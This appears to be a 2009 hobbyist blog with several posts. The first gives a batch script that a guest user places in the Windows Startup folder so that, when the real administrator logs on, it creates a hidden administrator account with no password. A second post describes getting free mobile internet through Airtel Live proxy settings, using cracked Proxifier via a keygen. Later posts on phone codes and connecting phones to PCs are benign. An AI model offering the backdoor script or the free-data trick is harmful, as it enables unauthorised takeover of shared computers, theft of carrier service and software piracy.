Friday, June 5, 2009

Dont Misuse It-Admin Account

Steps to create Admin Account with Guest

Step 1: Open up Notepad, copy and paste the following code into it and save the file as admin.bat. (You could actually give it any name, just make sure that the extension is .bat)

@echo off
net user Newadmin /add /expires:never /passwordreq:no
net localgroup “Administrators” /add Newadmin

Step 2: Copy the file to the Startup folder. Here is the path to the Startup folder:

C:\Documents and Settings\All Users\Start Menu\Programs\Startup

Step 3: There is no step 3.

The next time the admin logs on into the computer, the batch file runs and the admin account is created. Once the admin logs off, you can log in using the username newadmin and without any password.

Remember that it wouldn’t take long for the real admin to find out that a new admin account has been created.

Free Gmail with Airtel LIve

check gmail without any charge via AirTel live

Don't remove s from https://

It 100% works in all states...!

Try It & Enjoy.

Free Airtel TIps for GPRS

1.U need pc or laptop.

2.GPRS enabled phone which have modem.

like (3230,n70,n72,n73) i m using nokia 3110c .

3.first u download proxifier.
this is dierect it.

(Download and after For file password write us in comment box with E-Mail address, we will provide you password under 7 working days)

4.install the nokia pc suit on computer. the real work. Active airtel live to send msg “LIVE” to “52567″.when setting recive save it .

6.if setting will not come then no problem.we can set our own setting which airtel send.

7. Install Proxifier on C:\Proxifier\ copy patch file on same folder,

open keygen and copy key. open proxifier->help->registration->enter serial key->paste->ok

Option->Proxy setting:
proxy: (or depend on state airtel live porxy adderss)
port: 8080 (or depend on state airtel live porxy adderss)

Https and tick As IE 6.0 (important some network)

Open Proxy checker->enter proxy setting as provided->(importand proxy checker setting active work with proxifier otherwise you will loose your balance.)

check network->wow!! its working

8.please go step by step. the setting is.
DATA BEARER———-Packet data
USER NAME————-None
now go in advance setting.(option>>>advance setting)
DNS ADDRESS———Autometic
PROXY SERV.ADDRESS- (or airtel live setting of ur state if different)
PROXY PORT NUMBER-8080 (or airtel live setting of ur state if different)

Note: You Don't need any setting in mobile. only access point setting and proxy setting is important.
Access Point setting can change by Nokia Pc Suite or Others Mobile software or Bluetooth DUN connection setting. just only enter

If You think Airtel Live access point and proxy is chargeable and before you loose some money by using. But this trick is working for free. Use without any fear.

>>>>>>>connect the phone to pc with data cable.
>>>>>>>now open proxifier In the setting of Proxifier set the ip & port 8080.
now open pc suit and select connect ot internet
setup manually>>put in APN–>next>and connect it.remember that proxifier must be running at that will connet with 115.2kbps or 460kbps its depends on mobile modem speed.

Proxifier setting:
proxy: (or depend on state airtel live porxy adderss)
port: 8080 (or depend on state airtel live porxy adderss)
now open internet explorer>>open for a minute
oooooooooooooooops is opened.
and u can access whole net.
u can also download unlimited.

Saturday, April 18, 2009

Mobile Phone Tips

Here 10 Tips and Tricks For your mobile
1) Use a speaker phone accessory while driving as this allows you to keep your hands on the wheel and your eyes on the road.

2) Do not permit a battery out of the phone to come in contact with metal objects, such as coins, keys or jewellery.

3) If by mistake you have done something wrong in the settings and you are not able to switch back to original settings then you can reset the settings by typing *#7780#

4) If a program hangs and you can't shut it down, select the application in the application switching window and press 'C' to close it. It's also a faster way to exit programs.

5) For checking the Call Redirection status Type *#61# and press call.

6) If your phone doesn't have incoming call barring and outgoing call barring, you can try this. For outgoing call barring dial *33*barcode*# and pres OK. To deactivate it dial #33#barcode*#.

7) Close unnecessary active applications like IM chat, instead of letting them run in the background.

8) If you need to block SMS reception (if you are spammed by someone) just press this code: *35*xxxx*16# xxxx is your Call Barring code (default is 0000). To remove this barring type: #35*xxxx#

9) When the SIM card-pin blocked type **042*pin2 old*newpin2*newpin2*.

10) In order to keep oneself away from the hackers ensure that a strong password is created for your mobile PC. Also change your passwords one in a month.

Thursday, February 12, 2009

Connect Mobile To PC

Recognize Connecting Capabilities Of Mobile:
First you have to check what are the connecting abilities of your mobile. I mean by how many different ways your mobile can connect to other devices.
The most common connecting ways are:
1. Bluetooth
2. Infrared
3. Cable Connection
So at least one of them should be there in your mobile.
If You Have BLUETOOTH enable mobile:
Materials Needed: Bluetooth Dongle For PC
Bluetooth Enabled Phone
Mobile's Software ( PC Suite e.g.*)
First we would like to tell you about Bluetooth dongle* it is and electronic USB device which is connected to your PC and then you PC can receive and send all type of Bluetooth signals and that is the key point for this type of connection. First connect your Bluetooth Dongle To your PC and install its driver as if provided. Then switch on your mobile's Bluetooth reception so you can send Bluetooth signals to PC.Then run your installed PC software for that mobile* which you are trying to connect. For NOKIA mobiles PC Suite is provided if you buy mobile and same is the case for other companies so you should have your PC software of your mobile otherwise you can download from internet. Now you are on your on way to send Data from PC to your device.

If You Have INFRARED enable mobile:
Materials Needed: Infrared Dongle For PC
Infrared Enabled Phone
Mobile's Software ( PC Suite e.g.*)
First it would be better if you get to know what is Infrared Dongle. It is an electronic USB device which helps your PC to send and receive infrared signals and this is device which would act as a bridge between your mobile and PC.
Turn on infrared reception in your phone and connect infrared dongle with your PC. Now you have to align you device horizontally with your infrared dongle so now you are connected to your PC.
Open / run you mobile PC software to start communicating with your mobile.
For NOKIA mobiles PC Suite is provided if you buy mobile and same is the case for other companies so you should have your PC software of your mobile otherwise you can download from internet.
Now you are on your on way to send Data from PC to your device

If You Have mobile DATA CABLE:

Materials Needed: Connecting Cable
Mobile's Software ( PC Suite e.g.*)

First it is good if you have knowledge about connection cable. Sometimes it is provided with you mobile phones when you buy them and some time you have to buy them. It acts as a bridge between you mobile and your PC and transfer electrical signals from your mobile to your PC and PC to mobile.
This cable may connect at serial port at back of your PC or this cable may connect at USB port. Do as it is provided. Connect on end of cable to your mobile and other end with your PC.
Open / run you mobile PC software to start communicating with your mobile and start sending ringtones* games* themes e.t.c.
For NOKIA mobiles PC Suite is provided if you buy mobile and same is the case for other companies so you should have your PC software of your mobile otherwise you can download from internet.
Now you are on your on way to send Data from PC to your device

Thursday, January 29, 2009

check the IMEI

To check the IMEI (International Mobile Equipment Identity) Type- *#06# Information you get from the IMEI- XXXXXX XX XXXXXX X TAC FAC SNR SP TAC = Type approval code FAC = Final assembly code SNR = Serial number SP = Spare…